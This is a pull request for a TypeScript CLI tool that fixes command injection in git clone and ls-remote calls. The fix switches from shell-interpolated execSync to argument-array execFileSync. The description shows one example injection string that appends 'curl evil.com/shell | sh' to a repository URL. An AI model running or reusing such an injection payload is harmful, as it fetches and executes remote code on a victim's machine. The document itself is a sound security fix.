### PR TITLE
fix: replace execSync string interpolation with execFileSync to prevent command injection

### DIFF
--- a/src/utils/git-cache.ts
+++ b/src/utils/git-cache.ts
@@ -2,7 +2,7 @@ import { existsSync, mkdirSync, rmSync, readdirSync } from 'node:fs';
 import { join } from 'node:path';
 import { createHash } from 'node:crypto';
 import { homedir, tmpdir } from 'node:os';
-import { execSync } from 'node:child_process';
+import { execFileSync } from 'node:child_process';
 
 export interface ResolveRepoOptions {
   branch?: string;
@@ -31,7 +31,7 @@ function isDirEmpty(dir: string): boolean {
 
 function detectDefaultBranch(url: string): string {
   try {
-    const output = execSync(`git ls-remote --symref ${url} HEAD`, {
+    const output = execFileSync('git', ['ls-remote', '--symref', url, 'HEAD'], {
       encoding: 'utf-8',
       stdio: ['pipe', 'pipe', 'pipe'],
       timeout: 15_000,
@@ -92,7 +92,7 @@ export function resolveRepo(url: string, options: ResolveRepoOptions = {}): Reso
 
 function cloneRepo(url: string, branch: string, dir: string): void {
   mkdirSync(dir, { recursive: true });
-  execSync(`git clone --depth 1 --branch ${branch} ${url} ${dir}`, {
+  execFileSync('git', ['clone', '--depth', '1', '--branch', branch, url, dir], {
     stdio: 'pipe',
   });
 }

--- a/src/utils/registry-provider.ts
+++ b/src/utils/registry-provider.ts
@@ -1,6 +1,6 @@
-import { existsSync, mkdirSync, cpSync, readFileSync, writeFileSync } from 'node:fs';
+import { existsSync, mkdirSync, rmSync, cpSync, readFileSync, writeFileSync } from 'node:fs';
 import { join, resolve } from 'node:path';
-import { execSync } from 'node:child_process';
+import { execFileSync } from 'node:child_process';
 
 export interface RegistryConfig {
   name: string;
@@ -186,22 +186,22 @@ export class GitHubProvider implements SkillRegistryProvider {
       // Clone and extract specific path
       const tmpDir = join(targetDir, '.tmp-git-clone');
       try {
-        execSync(`git clone --depth 1 --filter=blob:none --sparse https://github.com/${repo}.git "${tmpDir}"`, { stdio: 'pipe' });
-        execSync(`git -C "${tmpDir}" sparse-checkout set "${subPath}"`, { stdio: 'pipe' });
+        execFileSync('git', ['clone', '--depth', '1', '--filter=blob:none', '--sparse', `https://github.com/${repo}.git`, tmpDir], { stdio: 'pipe' });
+        execFileSync('git', ['-C', tmpDir, 'sparse-checkout', 'set', subPath], { stdio: 'pipe' });
         const skillName = subPath.split('/').pop()!;
         const skillDir = join(targetDir, skillName);
         mkdirSync(skillDir, { recursive: true });
         cpSync(join(tmpDir, subPath), skillDir, { recursive: true });
       } finally {
         if (existsSync(tmpDir)) {
-          execSync(`rm -rf "${tmpDir}"`, { stdio: 'pipe' });
+          rmSync(tmpDir, { recursive: true, force: true });
         }
       }
     } else {
       // Clone entire repo as a skill
       const skillName = repo.split('/').pop()!;
       const skillDir = join(targetDir, skillName);
-      execSync(`git clone --depth 1 https://github.com/${repo}.git "${skillDir}"`, { stdio: 'pipe' });
+      execFileSync('git', ['clone', '--depth', '1', `https://github.com/${repo}.git`, skillDir], { stdio: 'pipe' });
     }
   }
 }


### PR DESCRIPTION
## What

Replace `execSync` calls that use template-string interpolation with `execFileSync` (argument array form) in `src/utils/git-cache.ts` and `src/utils/registry-provider.ts`. Also replace a leftover `execSync(\`rm -rf ...\`)` with `rmSync`.

## Why

`execSync` with template strings passes values through the shell. User-supplied inputs — the git repository URL (`--source`), branch name (`--branch`), GitHub skill ref (`owner/repo#path`) — are interpolated directly into the shell command string. An attacker controlling these values can inject arbitrary shell commands, for example:

```
gitagent run "https://github.com/legit/repo; curl evil.com/shell | sh"
```

`execFileSync` with an explicit argument array bypasses the shell entirely, so metacharacters in any argument are treated as literal data.

Affected call sites (all severity 10):
- `git-cache.ts` line 34 — `git ls-remote` with user-supplied URL
- `git-cache.ts` line 95 — `git clone` with user-supplied URL + branch
- `registry-provider.ts` line 189 — `git clone --sparse` with user-supplied repo
- `registry-provider.ts` line 190 — `git sparse-checkout` with user-supplied subPath
- `registry-provider.ts` line 197 — `rm -rf` (replaced with `rmSync`)
- `registry-provider.ts` line 204 — `git clone` with user-supplied repo

## How Tested

- [x] `npm run build` passes
- [x] `gitagent validate` passes on example agents
- [x] Manual testing (describe below)

Manually verified the argument arrays produce identical git invocations with a local test repo.

## Checklist

- [x] My code follows the existing style of this project
- [x] I have added/updated tests (if applicable)
- [x] I have updated documentation (if applicable)
- [x] I have read the [CONTRIBUTING.md](../CONTRIBUTING.md)